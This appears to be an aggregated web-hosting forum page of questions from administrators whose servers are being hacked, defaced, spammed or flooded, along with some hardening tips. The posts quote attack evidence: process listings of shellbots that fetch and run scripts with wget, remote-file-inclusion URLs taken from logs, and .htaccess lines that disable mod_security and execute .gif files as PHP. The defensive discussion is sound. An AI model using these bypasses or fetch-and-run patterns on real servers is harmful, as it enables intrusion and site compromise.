My Server Attack By Hackers
Nov 7, 2009two of my website on the server was changed by the hackers.How did they do it?
View 7 Repliestwo of my website on the server was changed by the hackers.How did they do it?
View 7 RepliesTwice in about a week mabey 2 weeks my server provider has sent me spoof abuse messages on accounts on my server. These phising pages first linked to a bank then paypal, these phising pages that were placed were on 2 diffrent accounts and the accounts belong to people ive known for a very long time and they wouldnt have any idea how to do this so i know its a hacker getting in somhow.
How can I stop this from happening? Any programs that I can run on the server?
Heck even which log files do I check to see where these attacks are coming from would help as I could block the IP's .
I'm running cpanel as well if that helps, i use CSF .
I dont want to have to move servers as that would take a very long time for me.
Does the use of partitions prevent hackers from getting access to the entire Unix server?
View 2 Replies View RelatedHackers these days don't hack for money, alot of times they hack for pride and the lame fun in it.
Look at this website,
[url]
I am constantly battling hackers over the last week and I have to admit I'm not really sure what it is that is letting them in, but they're getting in... the processes all run as "apache" so clearly it's the webserver somehow.
I've changed the ssh port, have disabled cron on the apache user and have set php safe_mode on the site I think might be to blame, but still no luck.
Logged in this morning to be greeted by this...
Quote:
[root@s15247463 httpdocs]# ps -fe | grep apache
apache 2889 2220 1 Dec26 ? 00:18:36 /usr/sbin/httpd
apache 2891 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd
apache 2892 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 2893 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 2894 2220 0 Dec26 ? 00:00:00 /usr/sbin/httpd
apache 2895 2220 0 Dec26 ? 00:00:05 /usr/sbin/httpd
apache 2896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 14664 2220 0 Dec26 ? 00:00:03 /usr/sbin/httpd
apache 32714 1 0 Dec26 ? 00:00:02 /apache/bin/httpd
apache 32719 1 0 Dec26 ? 00:00:02 /apache/bin/httpd
apache 19751 2894 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 19764 1 23 Dec26 ? 03:31:35 shellbot
apache 28642 2220 0 Dec26 ? 00:00:04 /usr/sbin/httpd
apache 28662 2891 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 28666 1 22 Dec26 ? 03:23:10 shellbot
apache 29532 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 29933 2220 0 Dec26 ? 00:07:18 /usr/sbin/httpd
apache 20833 2893 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20838 1 13 Dec26 ? 01:21:35 [httpds]
apache 20847 29532 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20853 1 13 Dec26 ? 01:21:33 [httpds]
apache 20870 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 20879 2892 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20884 1 13 Dec26 ? 01:21:28 [httpds]
apache 20887 2896 0 Dec26 ? 00:00:00 [sh] <defunct>
apache 20892 1 13 Dec26 ? 01:21:16 [httpds]
apache 20895 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 20896 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 20901 2220 0 Dec26 ? 00:00:02 /usr/sbin/httpd
apache 21445 2220 0 Dec26 ? 00:00:01 /usr/sbin/httpd
apache 1875 1 0 00:01 ? 00:00:00 [httpds]
apache 2237 1 0 00:14 ? 00:00:00 ./mocks start
apache 5465 20895 0 00:23 ? 00:00:00 [sh] <defunct>
apache 5477 1 6 00:23 ? 00:24:48 shellbot
apache 10110 14664 0 01:00 ? 00:00:00 [sh] <defunct>
apache 10142 1 11 01:00 ? 00:44:09 shellbot
apache 10537 2220 0 01:27 ? 00:00:01 /usr/sbin/httpd
apache 13780 1 0 02:28 ? 00:00:00 [httpds]
apache 13781 13780 0 02:28 ? 00:00:00 sh -c wget [url]
-O [url]
apache 13784 1 0 02:28 ? 00:00:00 [httpds]
apache 13785 13784 0 02:28 ? 00:00:00 sh -c wget[url]
-O [url]
apache 13788 1 0 02:28 ? 00:00:00 [httpds]
apache 13789 13788 0 02:28 ? 00:00:00 sh -c wget [url]
-O [url]
apache 13792 1 0 02:28 ? 00:00:00 [httpds]
apache 13793 13792 0 02:28 ? 00:00:00 sh -c wget [url]
-O [url]
apache 13798 13789 0 02:29 ? 00:00:00 perl test.txt
apache 13802 13781 0 02:29 ? 00:00:00 perl test.txt
apache 13806 13793 0 02:29 ? 00:00:00 perl test.txt
apache 13810 13785 0 02:29 ? 00:00:00 perl test.txt
apache 22282 2220 0 03:40 ? 00:00:00 /usr/sbin/httpd
apache 22434 20896 0 03:51 ? 00:00:00 [sh] <defunct>
apache 22442 1 10 03:51 ? 00:20:33 [httpd]
apache 22513 21445 0 03:55 ? 00:00:00 [perl] <defunct>
apache 22515 1 0 03:55 ? 00:00:00 /usr/local/apache/bin/nscan -DSSL
apache 22552 2220 0 03:58 ? 00:00:00 /usr/sbin/httpd
apache 23183 1 0 04:03 ? 00:00:48 /usr/local/apache/bin/nscan -DSSL
apache 23187 1 0 04:03 ? 00:00:47 /usr/local/apache/bin/nscan -DSSL
apache 3606 2220 0 04:52 ? 00:00:00 /usr/sbin/httpd
apache 27716 1 0 06:54 ? 00:00:00 [httpd]
apache 27720 1 0 06:54 ? 00:00:00 ./php
apache 28140 1 0 07:06 ? 00:00:00 /bin/sh ./mass 139
apache 28299 28140 0 07:12 ? 00:00:00 /bin/bash ./a 139.1
apache 28302 28299 9 07:12 ? 00:00:20 /bin/bash 139.1 22
We are rookies and we are being attacked by hackers for the second time in as many weeks. I can see them in shell right now on multiple servers. I can not remember in all the excitement how to take away their root access. How do I stop them from doing any more damage?
View 6 Replies View Relatedthis is the site whose banners appeared on my kids site after hacking,
View 0 Replies View RelatedMy PR4 site has been hacked by chinese hackers.
They fortunately did not do anything exceptionally terrible, but the site was down, they altered the serps results and now my inbox ( operating from Squirelmail ) is now receiving even more spam than before.
A network expert suggested that my server would now be being used for sending spam.
And my company, who will remain nameless atm seem to claim that no server is safe from hackers under any circumstances.
I would like to copy to you the companies response to my questions and I would hope for a word or two of inspiration and encouragement from you?
The second string in each question is the server companies response.
1.Please quote me for checking to see if the server is being used for spam and blocking this from happening.
We could certainly check and see if you server is currently sending out any spam and try to identify where it is originating from. Depending on the issue a fix may be required by your developers
2.Running a check on the sites code to see if there has been any amendments to the coding on the site
We can check and see if there has been any FTP access and look at file modification dates, this would hopefully pick up and issues.
3.Making sure the server is safe and that all China ip ranges are banned.
Whilst we cannot ban all Chinese ranges as we do not know all ranges China uses we can lock FTP and SSH access to certain ranges only, you would need to provide these ranges.
4.Applying a second level of security to stop a spammer from hacking the system ( However I am sure I already have anti virus and spy ware on the server )
I’m not sure you do have any anti-virus/spyware on your server, it is certainly not something we install. I don’t really believe either of those tools would stop someone hacking the server either, Linux server don’t really get affected by that. We could run a rootkit checker which checks for backdoors and modification of the operating system files. We would also suggest making sure the scripts are secure and any web interface (admin area) logins have secure passwords and are also IP restricted.
For the work above we would charge 1 hour support at £150 per hour ex vat.
I am giving few tips on securing your server against hack attempts. You must check these inspite of other securities like firewall, rootkits detectors etc.
1. Most Important, do not disable safe_mode under php.ini. If any customer asks to disable it, turn it off on his account only, not on whole server.
As most of the time attack is done using shellc99 (phpshell) script. In case safe_mode is off on server and there are public dirs with 777 permission, he can easily hack through.
2. Compile apache with safe mode as well.
3. In cpanel under tweek settings, turn on base_dir, if someone requests to turn off, turn it off on his/her account only. As using phpshell one can easily move to main server dirs like /etc, /home.
4. Do not allow Anonymous Ftp on your server. You can turn it off from ftp config under WHM Service Configuration. If its allowed, one can easily bind port using nc tool with your server and gain root access. Always keep it disabled.
5. Make sure /tmp is secured. You can easily do that by running this command /scripts/securetmp using ssh. But do make sure, /tmp is secured. Else one can upload some kind of perl script in /tmp dir and can deface or damage all data on the few/all accounts on your server.
keeping your server secure from hack attempts.
What would you think about creating a big text file with IPs of known hackers, bots and similar "bad" creatures to keep out from our servers? Do you think it's worth it?
You can post lists of IPs if you want...
I've been on yet-another crusade this morning..and have a few questions for the..umm.."general" hosting audience.
We live in odd times. If you told me that script kiddies might be able to completely comprimise a server via php..or that spammers are now using the webserver *itself* to send spam a few years ago..I would have laughed. This is no laughing matter.
A concept of privacy comes into play..and I'm curious how many of you handle it. Joe pays me for a account..agrees to my TOS/AUP..and starts uploading files. The way I see it..we have many ways of dealing with scripts that do bad things. It seems to me, though...this may be considered "spying" on our customers.
If we have a script..say..that runs every fifteen minutes..and looks for these scripts..wouldn't that be considered spying?
Or would this be something we should just bury in our aup/tos that this might happen? I have read and agreed to quite a few of those AUP/TOS things..and I can't remember even one time even a mention that files that I upload to the server may be scanned or inspected..before allowing the file to be placved on the server.
Never..not once.
However...this may have changed. If you've ever tried to get even a simple Perl script to work on a Cpanel server...you probably understand that many safeguards are there for the sake of everybody else on the server...and may prevent you from doing what you want to do with the script(s).
At the same time..though..it seems to fly in the face of common sense that many script packages available today are inherently insecure. Chmod 777 files and directories? Even in the times we live in today and know this is a very, very bad idea?
Yet..there seem to be even more like this today than ever before.
>>I mention this from first hand expereince. One of the many magazines I get had a article detailing the trials the author was having trying to get Simple Groupware working on a vps.
yesterday..I noticed a post with a person wanting something installed on a production server. Not only was the program a beta..but..just like Simple Groupware..looked horribly insecure.
In retrospect...I can remember the very first php script I ever used. The year was 1996..and this was my first Cpanel shared account. I even remember having to add *.php to the mime types.
It installed without a hitch..and..coming from the Perl world I had spent many years in..and many hours getting those scripts to work..it seemed almost like a miracle.
It seems, as hosts, there are a few ways we can go at this.
1) Modify the ftp server so it inspects files
2) Have a program that looks for things..much like rkhunter does.
3) A front-end for all scripts..perhaps MySQL as well..that enforces rulesets..for restricted content..or resource allocations.
One of my servers which hosts 200 domains is being attacked by hacker(s). It seems any world writeable files are being replaced or modified by the linux account nobody. How can I secure this account? Is it safe to change the password? I know many processes depend on using the nobody account to run.
View 1 Replies View RelatedMy server is currently underattack, I have been able to keep it up but after I ban 500 IPs, I get a lot of different IPs again.
Any idea or suggestion to do mass-ban to those attacking IPs?
tcp 0 0 xxx.xx.xxx.xxx:80 190.87.128.59:3965 SYN_RECV
tcp 0 0 xxx.xx.xxx.xxx:80 82.115.52.10:2323 SYN_RECV
tcp 0 0 xxx.xx.xxx.xxx:80 90.148.137.56:21094 SYN_RECV
tcp 0 0 xxx.xx.xxx.xxx:80 189.237.35.155:57605 ...
guys im tired off fighting those hackers everyday! i have about 20 websites,and everyday i have one of them hacked! i restore a backup then another one hacked!
thats unbelivable!!!
those bastards upload there shell scripts to websites via bugs or whatever from php files!!
is there anyway to stop these commands?
can .htaccess helps? how?
i talked to my webhosting companies for my websites! ....
For you, what a webmaster must do to prevent get hacked?
View 14 Replies View Relatedhow to secure my website from hackers, or anything like that. I host my own website, from a home server and I was wondering what I can do to protect me and my website.
View 5 Replies View RelatedMy site is going down lot of times due to high cpu quota and when i check cpu exceeded logs i could see some ip addresses trying to open non existenet permalinks i.e. my site is smartdesis.com and they try to open smartdesis.com/xxx which gives a 404 error which is causinf high cpu usage. Repetedly they are trying to open differnt urls by appending /xxx to them, i banned nearly 100 ips but they seem to be growing.
View 10 Replies View RelatedSomeone is trying to attack our server (I think so). When running apache status there are a LOT of connections from one network, all requesting the same page. But running: netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n does show any of these IP's. So script blocking ddos attacks wont work. Anyone know what can I do about this?
View 14 Replies View RelatedI went today to my apache error log, and noticed that those scum lowlifes hackers trying to hack my server every day for at least 100 times!!!
What a disaster!
Examples of urls they trying to use:
- http://usuarios.arnet.com.ar/larry123/safe.txt?
- http://uploaded.justfree.com/id.txt?
- http://nukedclx.info/php/base
Is there anything that can be done to prevent this mor*** from even trying to hack (except putting a bullet in his/their head)?
i got botnet attack my web server...is there anything i can do to block thse attack? my host isnt help much?
View 4 Replies View Relatedhow to protect an linux dedicated server from bot attack. Im using linux server with cPanel, using CSF firewall + DOS Deflate.
View 5 Replies View RelatedHow can check server for dos/ddos/syn attack?
Because my server load is high, perfromance is low, but i dont have any high process.
is this DDOs attack : .....
View 5 Replies View RelatedI think I'm experiencing some type of alternative to a DDoS attack. My server is being killed by thousands of emails being sent to fake accounts on my server.
I'm not a server administrator, so please bear with me.
My load average is skyrocking to 800.xx at times. I look at "top" and see "exim" for one specific user on my server. I own all the websites on my server, by the way.
When I look at my email queue, I see thousands of emails coming in to accounts that don't exist for that specific user. Let's say the domain name is salcollaziano.com. Somebody is sending spam to various salcollaziano.com aliases that don't exist. Like webmaster -at- salcollaziano.com and suzy -at- salcollaziano.com.
How can I prevent these spam emails from having any interaction with my server? It's causing me a lot of downtime on all the sites I have running on that particular server.
Not sure if it's a valid threat, but I would like to do the best I can to identify one as early as possible.
Can someone maybe give me an idea of what to look for? They were not specific on there type of attack, but I was hoping that there was maybe a log file I could tail and keep an eye out for irregularities.
my server got phisihing attack with bankamerica/paypal etc. i wounder because we have tight firewall/security etc. but any way this is teribel. i have found ip when look in to /var/log/messages -
its looks like (?@85.201.19.xxx). is it used anonymos ftp? i found same ip used to log in to another ftp host as well.
My server (Xeon 3.0Ghz) went down for no reason yesterday and ever since it was rebooted (and I've rebooted a couple of times since then), pages load extremely slowly or just timeout. Server load is constantly hovering around 1 and top stats indicate that the server's resources are not under heavy load, which is contrary to the usual pattern during peak times.
I've checked netstat and I notice a lot of SYN_RECV. Could this be a DoS attack? If so, what steps do I take to stop it?
Am suffering from a hacker every time, he changes my client’s index (index..Php).
I changed FTP log, but still, it seems doesn’t work!
My simple question: How to protect the index page from hackers?
I've seen perl scripts able to achieve this, so I am wondering if a tool similar to this has been released to work with APF / Iptables?
The script in question is a "bot trap" and you put a deny rule in robots.txt to a hidden file.
In that file, the script records the offending IP and blocks it in htaccess (once the file in question is hit by a bot/person).
Getting a bit tired of seeing these morons always searching for:
/phpmyadmin
/pma
etc, etc.
i have a problem with a hacker that uses .htaccess to disable mod_security
using this code
PHP Code:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
so is there a way to stop this?
also they have come up with a smart way to run shell files named as images using this code in .htaccess
PHP Code:
AddType application/x-httpd-php .gif
is there a way to disable the "AddType application"?
I've been concerned about executing commands through (./) using php and perl shells on the server
a new way of hacking these days is using perl shells , even if the perl was terminated on the server ,, or was forbidden for users
hackers upload a (perl) program to the server to use it instead of the server's own perl
any way ,,
chmoding the (ls-cat-more-less) to 4750 seems to give permission denied when exeuting these programs on the server
but the hackers also found that they could upload their own ls-cat-more-less programs and use them instead of the server's
they also could rename them ls==>ki or anything and use them like this
./ki /etc/valiases -alXrt
and the commands work like charm for them
./ <<--- this command uses the sh program on the server ,, ((sh which refers to bash on most servers))
so
./ki
is the same as
sh ki
and
bash ki
so i tried chmoding sh with 4750 and that killed the exploit
i was concerned about cpanel's and the website's functionality
so i tried changing an accounts password and creating a database ,, they both worked fine
so ,, if u thing chmoding 4750 sh is a bad idea please let me know
and if you know any other ways of disabling all the perl scripts on the server